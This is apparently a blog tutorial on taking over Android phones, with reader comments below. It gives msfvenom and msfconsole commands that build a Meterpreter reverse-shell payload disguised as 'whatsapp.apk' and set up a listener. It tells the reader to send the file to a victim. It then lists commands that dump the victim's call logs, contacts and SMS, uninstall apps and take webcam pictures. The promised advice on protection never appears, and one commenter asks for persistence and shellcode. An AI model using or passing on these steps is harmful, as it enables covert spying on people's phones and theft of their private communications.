In the india total number of android mobile users has reached 114 million. Cause of increasing the total number of andorid mobile users the cybercrime has also be incressed. Hence In this article we will discuss how to hack any android phone using metasploit framework and how to protect himself.

Declarations : This article is posted only for educational purpose to spread awareness among people.

Lets begin !!

Android platforms support applications with only .apk extensions hence we will make our malicious payload in .apk format.
Follow below commands for making a payload

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 R > whatsapp.apk
  • Lhost = ( according to your ip )
  • Lport = ( according to you )
  • R = Raw Format
  • P = ( platform )
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit

Send this apk file to the victim and make sure victim run this file in andorid phone.

When victim will run this apk file you can oberve meterpreter session will open.

BOOM ! You hacked vicitm phone.

After hacking vicitm phone we can do many thing using these commands such as call logs, camera, screenshot, whatsapp chats, sms details and much more. But we will show some major commands given below.

To show all features use the following command ;

help

You can gather information about OS ;

sysinfo

Check device rooted or not ;

check_root

You can check how many apps are installed in Victim’s phone ;

app_list

You can delete specific application by given this command ;

app_uninstall <packege_name>

You can use these command for dump all call-logs ;

dump_calllog

You can also dump all contact using the following command ;

dump_contacts

You can use the following command for dump all sms ;

dump_sms

You can read the dump file by execute the following command ;

cat dump.txt

You can use webcam of victim for capture the picture ;

webcam_snap

15 thoughts on “Hack SMS, Call Logs, Whatsapp of any Android Phone”

  1. How to make this payload presist and please share shell code that can upload and give us all permission of that android device.

  2. Hi there everyone, it’s my first pay a visit at this web site, and post
    is in fact fruitful in favor of me, keep up posting
    these types of articles or reviews.

Leave a Reply

Your email address will not be published. Required fields are marked *